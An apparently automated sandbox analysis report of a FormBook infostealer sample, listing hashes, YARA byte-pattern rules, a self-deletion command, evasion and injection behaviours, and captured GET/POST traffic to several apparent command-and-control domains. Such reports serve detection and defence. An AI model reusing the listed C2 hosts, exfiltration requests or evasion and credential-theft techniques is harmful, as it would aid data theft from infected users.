
Analysis Report R6o4qCis6s.exe

Overview

General Information

Sample Name: R6o4qCis6s.exe
Analysis ID: 287799
MD5: 79f04bd1fc5f9757f7979bb8cbefdd5e
SHA1: e34056989f520736af44df68d869b71a4d4d695f
SHA256: 8aafecddd3b462d27c24000757496edb5c6bce1e6abff9157d5360457b0805d7
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • R6o4qCis6s.exe (PID: 6652 cmdline: 'C:\Users\user\Desktop\R6o4qCis6s.exe' MD5: 79F04BD1FC5F9757F7979BB8CBEFDD5E)
    • R6o4qCis6s.exe (PID: 6680 cmdline: 'C:\Users\user\Desktop\R6o4qCis6s.exe' MD5: 79F04BD1FC5F9757F7979BB8CBEFDD5E)
      • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 7040 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 368 cmdline: /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Columns: Source, Rule, Description, Author, Strings
Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
    • 0x18349:$sqlite3step: 68 34 1C 7B E1
    • 0x1845c:$sqlite3step: 68 34 1C 7B E1
    • 0x18378:$sqlite3text: 68 38 2A 90 C5
    • 0x1849d:$sqlite3text: 68 38 2A 90 C5
    • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Columns: Source, Rule, Description, Author, Strings
Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
        • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
        • 0x18349:$sqlite3step: 68 34 1C 7B E1
        • 0x1845c:$sqlite3step: 68 34 1C 7B E1
        • 0x18378:$sqlite3text: 68 38 2A 90 C5
        • 0x1849d:$sqlite3text: 68 38 2A 90 C5
        • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: R6o4qCis6s.exe, Avira: detected
Antivirus detection for URL or domain
Source: http://www.heyidianzib.com/tln/, Avira URL Cloud: Label: malware
Source: http://www.heyidianzib.com, Avira URL Cloud: Label: malware
Source: http://www.heyidianzib.com/tln/www.olisolution.com, Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: www.glowtey.com, Virustotal: Detection: 7%
Source: http://www.glowtey.com/tln/, Virustotal: Detection: 8%
Source: http://www.glowtey.com, Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: R6o4qCis6s.exe, Virustotal: Detection: 77%
Source: R6o4qCis6s.exe, ReversingLabs: Detection: 79%
Yara detected FormBook
Source: Yara match, File source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: R6o4qCis6s.exe, Joe Sandbox ML: detected
Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\R6o4qCis6s.exe, Code function: 0_2_00408D20 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
Source: C:\Users\user\Desktop\R6o4qCis6s.exe, Code function: 0_2_00405BE0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49734
Source: global traffic, HTTP traffic detected:
  GET /tln/?TTF=D8Oxqr&jfIlkD=Gih6PLZ1iCkKV6XaU73/B7cCcaHYH4uOLwbm5LWBOFF6YtYGomD/H0QVY53aBPOxn4Dm HTTP/1.1
  Host: www.cashflowtoday.net
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /tln/?jfIlkD=aheimOvVxRHS9+ZkV/8M4zSPjXUKcvGCrPlEERzYyjhu9GlhsqSRacAATphOmA3mqti9&TTF=D8Oxqr HTTP/1.1
  Host: www.themayoparty.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View, IP Address: 34.102.136.180
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: Joe Sandbox View, ASN Name: GOOGLEUS
Source: global traffic, HTTP traffic detected:
  POST /tln/ HTTP/1.1
  Host: www.themayoparty.com
  Connection: close
  Content-Length: 412
  Cache-Control: no-cache
  Origin: http://www.themayoparty.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.themayoparty.com/tln/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic, HTTP traffic detected:
  POST /tln/ HTTP/1.1
  Host: www.themayoparty.com
  Connection: close
  Content-Length: 163864
  Cache-Control: no-cache
  Origin: http://www.themayoparty.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.themayoparty.com/tln/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: unknown, DNS traffic detected: queries for: www.cashflowtoday.net
Source: unknown, HTTP traffic detected:
  POST /tln/ HTTP/1.1
  Host: www.themayoparty.com
  Connection: close
  Content-Length: 412
  Cache-Control: no-cache
  Origin: http://www.themayoparty.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.themayoparty.com/tln/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.cashflowtoday.net
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.cashflowtoday.net/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.cashflowtoday.net/tln/www.themayoparty.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.cashflowtoday.netReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.creditcommoncents.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.creditcommoncents.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.creditcommoncents.com/tln/www.daddaenterprises.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.creditcommoncents.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.daddaenterprises.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.daddaenterprises.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.daddaenterprises.com/tln/www.keytoblogging.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.daddaenterprises.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.ero-special.net
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.ero-special.net/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.ero-special.net/tln/www.kjvrvg.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.ero-special.netReferer:
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.glowtey.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.glowtey.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.glowtey.com/tln/www.proseo.digital
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.glowtey.comReferer:
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.heyidianzib.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.heyidianzib.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.heyidianzib.com/tln/www.olisolution.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.heyidianzib.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.jgdesignco.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.jgdesignco.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.jgdesignco.com/tln/www.heyidianzib.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.jgdesignco.comReferer:
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.keytoblogging.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.keytoblogging.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.keytoblogging.com/tln/www.montieri.net
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.keytoblogging.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.kjvrvg.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.kjvrvg.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.kjvrvg.com/tln/www.jgdesignco.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.kjvrvg.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.laesses.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.laesses.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.laesses.com/tln/www.creditcommoncents.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.laesses.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.montieri.net
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.montieri.net/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.montieri.net/tln/v
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.montieri.netReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.olisolution.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.olisolution.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.olisolution.com/tln/www.onthejoblanguages.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.olisolution.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.onthejoblanguages.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.onthejoblanguages.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.onthejoblanguages.com/tln/www.laesses.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.onthejoblanguages.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.proseo.digital
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.proseo.digital/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.proseo.digital/tln/www.saliwasims.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, String found in binary or memory: http://www.proseo.digitalReferer:
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.saliwasims.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.saliwasims.com/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.saliwasims.com/tln/www.ero-special.net
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.saliwasims.comReferer:
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, explorer.exe, 00000005.00000002.484794744.0000000004EA9000.00000004.00000001.sdmpString found in binary or memory: http://www.themayoparty.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, explorer.exe, 00000005.00000002.484794744.0000000004EA9000.00000004.00000001.sdmpString found in binary or memory: http://www.themayoparty.com/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.themayoparty.com/tln/www.glowtey.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.themayoparty.comReferer:
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000005.00000002.476037597.00000000001E8000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Gw
          Source: explorer.exe, 00000005.00000003.355707285.0000000005940000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.liv
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00424C58 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0043A784 GetKeyboardState

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE
